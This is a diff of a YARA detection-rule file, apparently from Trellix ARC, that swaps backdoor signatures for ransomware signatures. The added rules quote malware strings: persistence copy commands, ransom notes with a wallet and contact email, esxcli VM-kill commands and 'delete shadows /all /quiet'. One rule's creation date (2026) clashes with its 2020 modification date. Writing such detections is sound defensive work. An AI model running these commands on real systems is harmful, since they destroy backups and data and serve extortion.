-		$s13 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
-		$s14 = "=Total path and file name length must not exceed %d characters" fullword wide
-		$s15 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
-		$s16 = "folder is not accessiblelSome files could not be created." fullword wide
-		$s17 = "Packed data CRC failed in %s" fullword wide
-		$s18 = "DDTTDTTDTTDTTDTTDTTDTTDTTDTQ" fullword ascii
-		$s19 = "File close error" fullword wide
-		$s20 = "CRC failed in %s" fullword wide
-		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
-		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
-		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
+		$s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii
+		$s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii
+		$s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii
+		$s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii
+		$s5 = "! Your computer's important files have been encrypted! " fullword ascii
+		$s7 = "This program is not supported on your operating system." fullword ascii
+		$s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii
+		$s9 = "Please enter the password." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB ) and all of them
 }
-rule TRELLIX_ARC_APT_Acidbox_Kernelmode_Module : KERNELDRIVER FILE
+rule TRELLIX_ARC_Ransom_Vovalex_Part2 : RANSOM FILE
 {
 	meta:
-		description = "Rule to detect the kernel mode component of AcidBox"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "80b60307-5431-5f21-9e6f-06adaab0519d"
-		date = "2020-07-24"
-		modified = "2020-08-14"
+		description = "Vovalex ransomware detection part 2"
+		author = "CB @ ATR"
+		id = "26c91d06-13da-5039-8b8a-eb8de2774d79"
+		date = "2021-02-01"
+		modified = "2021-02-01"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L1-L32"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Vovalex1.yar#L3-L42"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "e39da89d0da22115ac7889bc73ff183973a6c5334e304df955362bde76694d42"
+		logic_hash = "82814fd9155ec910c6353de8336733704e05c9f02409ad99cd80da8ef9fe3c04"
 		score = 75
-		quality = 70
-		tags = "KERNELDRIVER, FILE"
-		rule_version = "v1"
-		malware_type = "kerneldriver"
-		malware_family = "Rootkit:W32/Acidbox"
-		actor_type = "APT"
-		actor_group = "Turla"
-		hash1 = "3ef071e0327e7014dd374d96bed023e6c434df6f98cce88a1e7335a667f6749d"
+		quality = 64
+		tags = "RANSOM, FILE"
+		malware_type = "Ransom"
+		malware_family = "Ransom:Win/Vovalex"
+		hash1 = "0604acc15196120db2f4ca922feb2a4c858a46123cb26e9af2ef97b4c7839121"
+		hash2 = "fe9ff27ec0a1a48cbb8bc043f260a656c221c6c61704187a390bc8da6f91103a"
+		hash3 = "3b198c367aca1d239abc48bdeb8caabf9b8f2b630071b8e0fd1e86940eab14d6"
 
 	strings:
-		$pattern_0 = { 897c2434 8978b8 8d5f28 448bc3 33d2 }
-		$pattern_1 = { 4c8d842470010000 488d942418010000 498bcf e8???????? 8bd8 89442460 }
-		$pattern_2 = { 4c8bf1 49d1eb 4585c9 0f88a2000000 440fb717 498bd0 }
-		$pattern_3 = { ff15???????? 4c8d9c2480000000 498b5b10 498b7318 498b7b20 4d8b7328 498be3 }
-		$pattern_4 = { 33d2 41b8???????? 895c2420 e8???????? }
-		$pattern_5 = { 895c2420 4885ff 0f8424010000 440f20c0 84c0 0f8518010000 }
-		$pattern_6 = { 85f6 0f8469fdffff 488d8424c8010000 41b9???????? }
-		$pattern_7 = { 894c2404 750a ffc7 893c24 41ffc3 ebcb 85c9 }
-		$pattern_8 = { 488b5c2450 488b742458 488b7c2460 4883c430 }
-		$pattern_9 = { 33d2 488b4c2428 e8???????? 448b842450040000 4503c0 4c8d8c2450040000 488bd7 }
+		$x1 = "If you don't know where to buy Monero - visit these websites: https://www.bestchange.ru/ https://www.bestchange.com" fullword ascii
+		$s2 = "Full list: https://www.getmonero.org/community/merchants/#exchanges" fullword ascii
+		$s3 = ": https://www.getmonero.org/community/merchants/#exchanges" fullword ascii
+		$s4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" fullword ascii
+		$s5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" fullword ascii
+		$s6 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" fullword ascii
+		$s7 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" fullword ascii
+		$s8 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\random.d" fullword ascii
+		$s9 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\conv.d" fullword ascii
+		$s10 = "3. If everything is good, you will receive the decryptor." fullword ascii
+		$s11 = "Attempting to flush() in an unopened file" fullword ascii
+		$s12 = "Monero: 4B45W7V1sJAZBnPSnvcipa5k7BRyC4w8GCTfQCUL2XRx5CFzG3iJtEk2kqEvFbF7FagEafRYFfQ6FJnZmep5TsnrSfxpMkS" fullword ascii
+		$s13 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\padding.d" fullword ascii
+		$s14 = "crypto.aes.AES!(4u, 8u, 14u).AES" fullword ascii
+		$s15 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\aes.d" fullword ascii
+		$s16 = "Monero - " fullword ascii
+		$s17 = "std.random.uniform(): invalid bounding interval " fullword ascii
+		$s18 = "crypto.aes.AESUtils" fullword ascii
+		$s19 = "2. Send us a mail with proofs of transaction: VovanAndLexus@cock.li" fullword ascii
+		$s20 = "crypto.aes" fullword ascii
+		$op0 = { 48 8d 8d 10 ff ff ff e8 4a 22 fe ff f7 df 89 bd }
+		$op1 = { e8 60 6e fb ff 34 01 75 d6 4c 8b 46 40 48 8b 56 }
+		$op2 = { 4c 8d 85 40 ff ff ff 4c 8d 15 d2 78 02 00 4c 89 }
 
 	condition:
-		7 of them and filesize < 78848
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_APT_Acidbox_Main_Module_Dll : BACKDOOR FILE
+
+rule TRELLIX_ARC_Megacortex_Signed : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Main mode component of AcidBox"
+		description = "Rule to detect MegaCortex samples digitally signed"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "8c9beb0f-62f7-5788-8340-0b1ecdf54253"
-		date = "2020-07-24"
+		id = "78a74e30-4de0-5e63-8ca5-31251c296f98"
+		date = "2026-03-01"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L34-L65"
+		reference = "https://blog.malwarebytes.com/detections/ransom-megacortex/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MegaCortex.yar#L3-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "db98e204742b8629074d47df301ffcbb2dfb977a4da91557fb50838aae79e777"
+		logic_hash = "8ffced3aca837682fbd7ee68f559f73b8299cbfbe198f48124c4857680735249"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Acidbox"
-		actor_type = "APT"
-		actor_group = "Turla"
-		hash1 = "eb30a1822bd6f503f8151cb04bfd315a62fa67dbfe1f573e6fcfd74636ecedd5"
-
-	strings:
-		$pattern_0 = { 7707 b8022d03a0 eb05 e8???????? }
-		$pattern_1 = { 4403c8 8bc3 41d1c6 33c6 81c6d6c162ca c1cb02 33c7 }
-		$pattern_2 = { e9???????? 412b5c2418 8b45dc 412b442408 41015c241c 410144240c 015f1c }
-		$pattern_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 }
-		$pattern_4 = { 48895c2408 57 4883ec30 498bd8 488bfa 488364245800 85c9 }
-		$pattern_5 = { 488987e0010000 e9???????? 81cb001003a0 e9???????? 488b87a0010000 44847806 742e }
-		$pattern_6 = { 4d8bcc 4c8d0596c50100 498bd4 488bce e8???????? 498b9de0010000 c74605aa993355 }
-		$pattern_7 = { 4533c0 8d5608 e8???????? 488bf0 4889442460 4885c0 750b }
-		$pattern_8 = { 488d5558 41c1ee08 41b802000000 44887559 e8???????? 4c8b4de0 894718 }
-		$pattern_9 = { 4d03c2 4d3bc2 4d13cc 4d0303 4d3b03 4d8903 4c8b13 }
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/MegaCortex"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	condition:
-		7 of them and filesize < 550912
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=GB/L=ROMFORD/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "53:cc:4c:69:e5:6a:7d:bc:36:67:d5:ff:d5:24:aa:4b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" or pe.signatures [ i ] . serial == "00:ad:72:9a:65:f1:78:47:ac:b8:f8:49:6a:76:80:ff:1e" )
 }
-rule TRELLIX_ARC_APT_Acidbox_Ssp_Dll_Module : BACKDOOR FILE
+rule TRELLIX_ARC_Ransom_Linux_Hellokitty_0721 : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the SSP DLL component of AcidBox"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "ef1511c5-f650-5e65-937c-466f00932183"
-		date = "2020-07-24"
-		modified = "2020-08-14"
+		description = "rule to detect Linux variant of the Hello Kitty Ransomware"
+		author = "Christiaan @ ATR"
+		id = "097b02e7-93d8-5d4f-9964-7b660b3cd7b9"
+		date = "2021-07-19"
+		modified = "2021-07-19"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L67-L98"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Linux_HelloKitty0721.yar#L1-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "4c9b9de11d73587ca1ad1efa5455598e41edc5a9a59fc0339c429a212c1c7941"
+		logic_hash = "77a3809df4c7c591a855aaecd702af62935952937bb81661aa7f68e64dcf4fb4"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Acidbox"
-		actor_type = "APT"
-		actor_group = "Turla"
-		hash1 = "003669761229d3e1db0f5a5b333ef62b3dffcc8e27c821ce9018362e0a2df7e9"
+		tags = "RANSOMWARE, FILE"
+		Rule_Version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:Linux/HelloKitty"
+		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
+		hash2 = "556e5cb5e4e77678110961c8d9260a726a363e00bf8d278e5302cb4bfccc3eed"
 
 	strings:
-		$pattern_0 = { 49897ba0 8bc7 49894398 49897ba8 33c9 49894bb0 }
-		$pattern_1 = { 8b8424a8000000 c1e818 88443108 66895c310a 498b0e }
-		$pattern_2 = { 8b5f48 413bdd 410f47dd 85db 0f84f1000000 488b4720 4885c0 }
-		$pattern_3 = { e8???????? 85c0 78c7 488d9424a0020000 488d8c24e0030000 ff15???????? 4c8bf8 }
-		$pattern_4 = { ff15???????? 488bc8 4c8bc6 33d2 ff15???????? 8bfb 895c2420 }
-		$pattern_5 = { 415f c3 4c8bdc 49895b10 }
-		$pattern_6 = { 488d842488010000 4889442420 41bf???????? 458bcf 4c8bc7 418bd7 488d8c2490000000 }
-		$pattern_7 = { c1e908 0fb6c9 3bce 77b6 8bd0 b9???????? c1ea10 }
-		$pattern_8 = { 4c8bc3 ba???????? 488d4c2438 e8???????? 89442430 85c0 7508 }
-		$pattern_9 = { bb02160480 8bc3 488b5c2440 488b742448 488b7c2450 4883c430 }
+		$v1 = "esxcli vm process kill -t=force -w=%d" fullword ascii
+		$v2 = "esxcli vm process kill -t=hard -w=%d" fullword ascii
+		$v3 = "esxcli vm process kill -t=soft -w=%d" fullword ascii
+		$v4 = "error encrypt: %s rename back:%s" fullword ascii
+		$v5 = "esxcli vm process list" fullword ascii
+		$v6 = "Total VM run on host:" fullword ascii
+		$v7 = "error lock_exclusively:%s owner pid:%d" fullword ascii
+		$v8 = "Error open %s in try_lock_exclusively" fullword ascii
+		$v9 = "Mode:%d  Verbose:%d Daemon:%d AESNI:%d RDRAND:%d " fullword ascii
+		$v10 = "pthread_cond_signal() error" fullword ascii
+		$v11 = "ChaCha20 for x86_64, CRYPTOGAMS by <appro@openssl.org>" fullword ascii
 
 	condition:
-		7 of them and filesize < 199680
+		( uint16( 0 ) == 0x457f and filesize < 200KB and ( 8 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_1 : BACKDOOR FILE
+rule TRELLIX_ARC_Ransom_Babuk : RANSOM T1027 T1083 T1057 T1082 T1129 T1490 T1543_003 FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 1"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "5b76ca62-460c-5c36-a239-700cc509f2b0"
-		date = "2020-04-17"
-		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L3-L33"
+		description = "Rule to detect Babuk Locker"
+		author = "TS @ McAfee ATR"
+		id = "7c0a3b4e-90aa-5442-aa5e-1a7fcae9bec8"
+		date = "2021-01-19"
+		modified = "2021-02-24"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BabukLocker_Jan2021.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0f6033d6f82ce758b576e2d8c483815e908e323d0b700040fbdab5593fb5282b"
-		logic_hash = "1487890494dde891a6dbe7dff7ebd5660ee01fe10220215e680115f168c2ae4a"
+		hash = "e10713a4a5f635767dcd54d609bed977"
+		logic_hash = "123cebd1c2e66f3e91ee235cb9288df63dfaeba02e6df45f896cb50f38851a8f"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		tags = "RANSOM, T1027, T1083, T1057, T1082, T1129, T1490, T1543.003, FILE"
+		rule_version = "v2"
+		malware_family = "Ransom:Win/Babuk"
+		malware_type = "Ransom"
+		mitre_attack = "T1027, T1083, T1057, T1082, T1129, T1490, T1543.003"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000002??3E????0000????1A????0000000040000000000000??????0000000000000000000040??????????????1D????????0000????????????000000000000??????4000000000??????4000000000????01??00000000????01??00000000????000000000000????0000??????0000????000000000000????4000000000000002????000000001C??0000000000001C??00000000000001??00000000000001??000005????????0000000000000000??????0000000000004000000000????76??00000000????76??000000000000????00000000????0000????0000000080????00000000????????????0000????????????000038??00000000000080??????00000000000020??0000000002??0000060000????80????0000000028??????????000028??????????0000A0????????0000????????????0000????000000000000??????000004??00001C??0000000000001C??4000000000??????4000000000????000000000000????000000000000??????00000000000050E5??6404??00009C6D0000000000009C6D4000000000??????????????0000DC??000000000000DC??00000000000004??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000????6C69????????????2D????????78??78??362D????????6F2E32??04??000010??000001??0000474E5500000000????0000????0000????000000000000????0000??????000001??000006000000000000????000020??0000??????00007D??5A580000000000000000000000000000000000000000000000000000000015????????00000000000000000000??????00000000000082????????00000000000000000000????????????0000????????????00000000000000000000????????????0000??????000012??0000000000000000000062??0000000000006A??000012??000000000000000000001B??0000000000007E??000012??000000000000000000008B??0000000000004902??????00000000000000000000????????????0000????????????00000000000000000000????????00000000??????000012??000000000000000000008E??000000000000F401??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????000000000000000000000000000000000000????0000????000000000000000000000000000000000000??????000012??0000000000000000000025????????0000????????????00000000000000000000????000000000000????0000????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????01??????00000000000000000000??????0000000000006602??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????000000000000????????????00000000000000000000????000000000000????01??????00000000000000000000????000000000000????0000????00000000000000000000????01??00000000????????????00000000000000000000????????????0000????????????00000000000000000000??????000000000000EC01??????00000000000000000000??????0000000000004B01??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????????????0000??????000012??0000000000000000000008??0000000000004302??????00000000000000000000????????????0000??????????????000000000000000000000A??0000000000003F01??????00000000000000000000????????????0000??????000012??00000000000000000000F0????00000000????01??????00000000000000000000??????????????00002F02??????00000000000000000000????01??00000000????????????00000000000000000000????000000000000??????????????0000000000000000000080????00000000????02??????00000000000000000000????000000000000??????000012??0000000000000000000074??000000000000BF????????00000000000000000000????????????0000????02??????00000000000000000000??????000000000000FA0000????00000000000000000000????????????0000??????000012??0000000000000000000011??000000000000A8??000012??0000000000000000000044000000000000??????000012??000000000000000000005A000000000000??????000012??0000000000000000000029??000000000000C6????????00000000000000000000????000000000000????????????00000000000000000000????000000000000????0000????00000000000000000000????????00000000????????????00000000000000000000??????000000000000BC????????00000000000000000000????02??00000000????01??????00000000000000000000??????00000000000034??000012??00000000000000000000A1????????0000????????????00000000000000000000????????????0000??????????????000000000000000000004B000000000000????0000????00000000000000000000????000000000000??????000012??0000000000000000000005????????0000??????000012??0000000000000000000031??00000000000074??000012??00000000000000000000FF??0000000000005E02??????00000000000000000000????000000000000????????????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????02??????00000000000000000000??????000000000000DE??000012??000000000000000000007B??00000000000030??000012??0000000000000000000075??000000000000D9??000012??000000000000000000000E000000000000????????????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????????????00000000000000000000????????????0000????????????00000000000000000000????000000000000????02??????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????????????00000000000000000000??????0000000000005201??????0000????174000000000????00000000000000005F5F676D6F6E5F73??6172??5F5F??????76??52656769????????????6173??6573??6C69????????????61642E????2E30??72??63????72??6D??????68????????5F63????6174????????6E6474????????75??65??????69??????????????6E6F5F6C6F63????69????????????6B????74??72??6164??73??676D6173????????6E6E6563??????74??72??6164??73??6C66??????63????74??70??68????????5F6465????63????6663????6C????????63??73??2E????????63????74??73??72??70????????69????????????????????616E64??????6574??6174??6E??????74??77??69??????????????6469????????????5F6E74??61??????74??72??69??????????????70??????????6D6F6E????????74??6E??????6C6563??????6B????????72??616C6C6F63??676574??69??????????????73??72??6F6B????63????77????????70??6173??72??3634??73??67656D70??79??6574??6D656D73??74??72??6469??????????????????6565??????68????????6173??74??6D65??????74??6F63????70????????616E74??74??6475??32??73??67616464????74??69????????????6472??6663??????65??????74??6F63????70????????6C6C6F63??73??72??6174??72??616C70??74????????6D6F76????????656E6469????????????6C??????74??6F73??62????616D65??????6563??????????72??74????????656164??????6C6F63????74??6C6F63????74??6D65??????616E6469????????????616464??????????????6565????73??74??69????????????????????6D6D6F76????????70??6E3634??5F5F6C69????????????72??5F6D6169????????????73??73??70??69????????????65????????78??74??74??34??474C4942435F32??32??35????????42435F32??33??000002??02??02??03??02??02??02??03??03??02??02??02??0000000002??02??02??02??02??03??02??02??02??02??02??02??02??02??03??02??02??02??04??02??02??03??02??03??02??02??02??03??02??02??02??02??02??03??02??02??02??02??02??02??03??02??02??03??02??02??02??03??02??03??02??03??02??02??02??02??02??02??03??03??03??02??02??02??02??02??000001??01??24??000010??000020??000075??69??????????9602??00000000????????????????????000000000000????69????????????A2????????0000??????69??????????9602??00000000????81????????????060000????????????000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000000082??????0000????0000??????0000000000000000000008??????????0000070000????????????000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000??????6000000000????0000??????000000000000000000004882??????0000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000?????? }
+		$s1 = {005C0048006F007700200054006F00200052006500730074006F0072006500200059006F00750072002000460069006C00650073002E007400780074}
+		$s2 = "delete shadows /all /quiet" fullword wide
+		$pattern1 = {006D656D74617300006D65706F63730000736F70686F730000766565616D0000006261636B7570000047785673730000004778426C7200000047784657440000004778435644000000477843494D67720044656657617463680000000063634576744D67720000000063635365744D677200000000536176526F616D005254567363616E0051424643536572766963650051424944505365727669636500000000496E747569742E517569636B426F6F6B732E46435300}
+		$pattern2 = {004163725363683253766300004163726F6E69734167656E74000000004341534144324457656253766300000043414152435570646174655376630000730071}
+		$pattern3 = {FFB0154000C78584FDFFFFB8154000C78588FDFFFFC0154000C7858CFDFFFFC8154000C78590FDFFFFD0154000C78594FDFFFFD8154000C78598FDFFFFE0154000C7859CFDFFFFE8154000C785A0FDFFFFF0154000C785A4FDFFFFF8154000C785A8FDFFFF00164000C785ACFDFFFF08164000C785B0FDFFFF10164000C785B4FDFFFF18164000C785B8FDFFFF20164000C785BCFDFFFF28164000C785C0FDFFFF30164000C785C4FDFFFF38164000C785C8FDFFFF40164000C785CCFDFFFF48164000C785D0FDFFFF50164000C785D4FDFFFF581640}
+		$pattern4 = {400010104000181040002010400028104000301040003810400040104000481040005010400058104000601040006C10400078104000841040008C10400094104000A0104000B0104000C8104000DC104000E8104000F01040000011400008114000181140002411400038114000501140005C11400064114000741140008C114000A8114000C0114000E0114000F4114000101240002812400034124000441240005412400064124000741240008C124000A0124000B8124000D4124000EC1240000C1340002813400054134000741340008C134000A4134000C4134000E8134000FC134000141440003C144000501440006C144000881440009C144000B4144000CC144000E8144000FC144000141540003415400048154000601540007815}
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
+		filesize >= 15KB and filesize <= 90KB and 1 of ( $s* ) and 3 of ( $pattern* )
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_2 : BACKDOOR FILE
+rule TRELLIX_ARC_Ransom_Xinof : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 2"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "c4ee686b-49d9-5566-b749-1144a19c1fee"
-		date = "2020-04-17"
-		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L35-L65"
+		description = "Detect Xinof ransomware"
+		author = "Thomas Roccia | McAfee ATR team"
+		id = "3b064ce4-cd5b-5a4a-bb55-a2c2c361791e"
+		date = "2020-11-20"
+		modified = "2020-11-20"
+		reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_xinof.yar#L53-L82"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "08cc67002782cbafd97a4bff549d25dd72d6976d2fdf79339aaf5a3ff7c3107e"
-		logic_hash = "08ea40ba72677263a41f62097fc38040361ba595d67cb04979b66548c7f4d271"
+		hash = "0c1e6299a2392239dbe7fead33ef4146"
+		logic_hash = "42110ee8869d56c53dc201cbc83652c6457541b8d502aa12b37ef6200e735a15"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
+		malware_type = "ransomware"
+		malware_family = "Ransom/XINOF"
 		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		actor_group = "FONIX"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????00000000000088????????????00000000??????38??05????????????????0000????????????0000000000000000??????0000000000004000000000??????0D??????????????0D????????0000????00000000????0000????0000????????????0000????????????0000????????????0000????12??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????????00000000????????00000000??????000000000000070000??????000080??????0000000080??????0000000080??????0000000028??00000000000070??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55????????????CC78??78??83????????????CB371F0000000080??????0000000025????????0000????7E??00000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000??????4200000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????76??00000000????????????0000????8B????00000000C8??????0000000025????????0000??????4200000000????76??00000000????????????0000????444200000000????76??00000000????????????0000??????4900000000????76??00000000????????????0000??????4600000000????76??00000000????????????0000????424200000000??????EC08??33??0000E8????????E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090554889??534883????80????????????75??BB????????488B??????????4881??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??B8????????4885??74??BF????????E8????????C6????????????4883????5BC9C30F1F????????????55B8????????4885??4889??74??BE????????BF????????E8????????4883????????????74??B8????????4885??74??BF????????C9FF??0F1F??????????C9C39090554889??534881??????????89??????????48C7????????????8B????3D????????0F87????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????BA????????488D??????????4889??4889??E8????????4889????4883??????0F84????????488D??????????488D??????????4889??4889??E8????????85??0F85????????488B??????????4889????C7????????????488B????89????488B????48C1????89????488B????4889????488B????4889??????488B????4889??????E8????????89????BE????????488D????E8????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????BE????????488D????E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??0F85????????8B????89??4889??48C1????8B????89??488D????4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7E??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??74??8B????48984801????488B????483B????7C??EB??90EB??90EB??90EB??90EB??90EB??90488B????4889??E8????????EB??90EB??90EB??